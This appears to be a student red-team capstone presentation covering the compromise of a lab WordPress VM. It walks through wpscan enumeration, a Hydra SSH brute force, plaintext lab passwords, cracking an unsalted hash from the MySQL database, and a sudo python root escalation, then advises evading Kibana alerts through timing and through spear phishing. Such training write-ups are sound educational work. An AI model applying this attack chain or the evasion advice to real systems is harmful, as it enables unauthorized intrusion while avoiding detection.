Red Team Engagement

​

Attack, Defense & Analysis of a Vulnerable Network

Table of Contents

Network Topology & Critical Vulnerabilities

This presentation contains the following resources:

Exploits Used

Methods Used to Avoid Detection

01

02

03

Network Topology & Critical Vulnerabilities

This section will assess the network topology used in this engagement followed by the critical vulnerabilities found on the Target 1 Virtual Machine when attacked using a Kali Linux Virtual Machine.

Network Topology

Network

Address Range:

192.168.1.0/24

Netmask:

Gateway: 192.168.1.1

​

Machines

IPv4: 192.168.1.90

OS: Debian Kali 5.4.0

Hostname: Kali

​

IPv4:192.168.1.110

OS: Debian GNU/Linux 8

Hostname: Target 1

​

IPv4: 192.168.1.105

OS: Ubuntu 18.04

Hostname: Capstone

​

IPv4: 192.168.1.100

OS: Ubuntu 18.04

Hostname: ELK

​

Critical Vulnerabilities on Target 1:

Screenshots of Critical Vulnerabilities:

• Command ran to find vulnerabilities: nmap --script vulners -sV 192.168.1.110
• https://nvd.nist.gov/vuln/search

Exploits Used

This section will demonstrate the methods taken to execute the exploits on the Target 1 Virtual Machine.

Exploitation: WordPress Enumeration

Summarize the following:

• How did you exploit the vulnerability?
• Used:

wpscan --url http://192.168.1.110/wordpress --enumerate u to enumerate the users on the web server.

• What did the exploit achieve?
• Gained critical information such as user information in order to SSH into server.

​

Exploitation: Weak Passwords

Summarize the following:

• How did you exploit the vulnerability?
• Used Manual Brute Force to guess the password
• Username: Michael
• Password: michael
• NOTE: Use of Hydra tool can be used to brute force the password if it can’t be guessed easily.
• Command syntax:
• Hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.110
• What did the exploit achieve?
• Granted SSH access to Michael’s account to gather the MySQL database password in the wp-config.php file which was found in the wordpress folder, which was found in the html folder.

​

​

Exploitation: Unsalted User Password Hash

Summarize the following:

• How did you exploit the vulnerability?
• Once we had the password R@v3nSecurity from Michael's account we were able to use Mysql to find Steven’s unsalted password hash.
• Mysql -u -root -p
• Password: R@v3nSecurity
• Show databases;
• Use wordpress
• Show tables;
• Select * from wp_users
• Used the John the Ripper tool to uncover the hashed password for Steven.
• What did the exploit achieve?
• Gave us Steven’s password to ssh into his account to access his information.

​

Exploitation: Misconfiguration of User Privileges

Summarize the following:

​

• How did you exploit the vulnerability?
• After gaining Access to Steven’s user account:
• Used sudo -l to obtain the information Steven had root access for.
• Used sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ to obtain root access

​

• What did the exploit achieve?
• Obtained access to the user shell to ultimately escalate up to root.
• Ssh steven@192.168.1.110
• Password: pink84
• Sudo -l
• Sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
• Cd /root

​

Methods Used to Avoid Detection

This section will detail the alerts placed in Kibana and what methods can be used to attack the machine while mitigating detection.

Stealth Exploitation of WordPress User Enumeration

Mitigating Detection

• These types of alerts are resource intensive, most companies run them during off hours. It would be best to perform the attack during business hours in order to mitigate detection
• Adding additional flags in order to take a more “stealthy” approach would limit the amount of http request bytes

Monitoring Overview

• Which alerts detect this exploit?
• In Kibana the alert is set :

WHEN sum() OF http.request.bytes OVER all documents IS ABOVE 3500 FOR THE LAST 1 minute

• Which metrics do they measure?
• http.request.bytes
• Which thresholds do they fire at?
• above 3500

​

​

Stealth Exploitation of SSH

Monitoring Overview

• Which alerts detect this exploit?
• Alert in Kibana:

WHEN count() GROUPED OVER top 5 ‘http.response.status_code’ IS ABOVE 400 FOR THE LAST 5 minutes.

• Which metrics do they measure?
• http.response.status_code
• Which thresholds do they fire at?
• Above 400

​

​

Mitigating Detection

• In order to limit the amount of error codes above 400, it would be critical to obtain the targeted user’s login credentials using methods that cannot be detected by an alert such as spear phishing or performing a man-in-the-middle attack.

Stealth Exploitation of Directory Exploration

Monitoring Overview

• Which alerts detect this exploit?
• In Kibana the alert is set :

When max() OF system.process.cpu.total.pct OVER all documents IS ABOVE 0.5 FOR THE LAST 5 minutes

• Which metrics do they measure?
• system.process.cpu.total.pct
• Which thresholds do they fire at?
• CPU usage greater than equal to 0.5 (50%)

​

​

​

Mitigating Detection

• Google Dorking could be used to find company employees (users), email addresses, vulnerable files and servers and even possibly passwords.

The End

Austin Baxter, Ben Horsley, Lauren Williams, Steph Hoffman, & Tom Kuhn